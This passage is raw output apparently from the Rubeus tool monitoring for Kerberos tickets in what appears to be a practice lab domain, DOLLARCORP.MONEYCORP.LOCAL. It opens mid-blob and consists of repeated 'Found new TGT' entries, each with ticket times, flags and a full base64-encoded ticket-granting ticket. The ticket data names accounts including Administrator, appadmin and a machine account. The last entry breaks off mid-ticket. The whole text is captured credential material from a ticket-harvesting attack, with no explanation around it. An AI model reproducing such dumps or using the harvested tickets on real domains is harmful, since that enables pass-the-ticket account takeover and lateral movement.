WeZl8R6Afq/2xto2KFEcBVCO81Y06FuQDqgHyyyBirSszGnMo7QkknbvLAKJjJDV+vub/gdIlks+nJYIxf5itYNDdPVbnMilP6ruiVpKE8em5j3+mPmdgwn+mb2N/fKB4rwFu1Pq6C2pbgG6Hu1ATuPF22Xf8A/HysRmgceuLcERGMjKkfZQ1dCVRoJcydbbkSDk2FoFCl86OJ8Ccn1sJ4LyRGIlz5fR/U+yXV8YrXA7w8U/vfEyC2jnPowETDGo4IBGjCCARagAwIBAKKCAQ0EggEJfYIBBTCCAQGggf4wgfswgfigKzApoAMCARKhIgQg/rb5+fRTzoVjuW+WANtTBAW3DywIctUficFJSroi7j+hHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1BZG1pbmlzdHJhdG9yowcDBQBgoQAApREYDzIwMjQwMzAyMjM1MjEyWqYRGA8yMDI0MDMwMzA5NTIxMlqnERgPMjAyNDAzMDkyMzUyMTJaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTA==


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:51:13 PM
  EndTime               :  3/3/2024 1:51:12 AM
  RenewTill             :  3/9/2024 3:51:12 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    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


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:50:12 PM
  EndTime               :  3/3/2024 1:50:12 AM
  RenewTill             :  3/9/2024 3:50:12 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    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


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:50:00 PM
  EndTime               :  3/3/2024 1:48:49 AM
  RenewTill             :  3/9/2024 3:48:49 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    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


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:48:12 PM
  EndTime               :  3/3/2024 1:48:12 AM
  RenewTill             :  3/9/2024 3:48:12 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    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


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:25:12 PM
  EndTime               :  3/3/2024 1:25:12 AM
  RenewTill             :  3/9/2024 3:25:12 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    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


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:10:28 PM
  EndTime               :  3/3/2024 1:10:28 AM
  RenewTill             :  3/9/2024 5:35:48 AM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  Base64EncodedTicket   :

    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


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:57:12 PM
  EndTime               :  3/3/2024 1:57:12 AM
  RenewTill             :  3/9/2024 3:57:12 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    doIGZjCCBmKgAwIBBaEDAgEWooIFNjCCBTJhggUuMIIFKqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBNIwggTOoAMCARKhAwIBAqKCBMAEggS8TaKk5WZqbl3Zb6MoOlu3rDD5HLLFQJ7xumueMc1pz68VsYwEIw8IiwSnqAfGFFLbGhbbExHHLA3X5BPEjdUhJjsWU4cWdJ0RfRaBa84gDHNpln5R65wH/ParK7doYcMb7RHqEtA18vYLR8/yeyRzKZc6QFQrCGOUFcnAj2ZfX1jwLdrpHjzRBpf+je0k4aMTTCyqSmq7BVUPApyWvqI9kMVJr9sxQoqdbbTax0kbk8HPSHjmz6M1Z3Iv97cyGcaW0C3M+6nFK94x5/puXI8WZGFX015POAaWj2jreeeVT+b3ohYkjakhdceeE8cvrk0XrhzSLj+71q/1UMkOYTPoDoEMXMMtBJbXHmoAKzJ4EzB30PwhTvrJzoZnJtYQhRbSUHx/h6GF35GVtuvloKewCYPVmTTBfI1w63ug0+X/RXYiP/BNteBt9aIu41WBXd6EibdFEKLJoxpThbfXqv8HHdj6GYcIYiVWUt+BbIZONNeBZS0dVDT2gLeTuMrg6v0giNPi5iyWmv7M7OvG5bVrXWy33D5X0xP0lNPek01V1N3kMMrIZyh5IBhqVNhnYgdmMgq2w4LIBhR6dGSK1OSgBG19MYK8Qvi0UfAF7TMPWrDnsYeC8AIvLGqS/lbuOvpZhnjQVbKoY2kcUd348vSKFI7aQwJyYc2bySSBPDTkKOcQfyLixichovK6kPOylz13dE7W2+t46Uz4lwLBk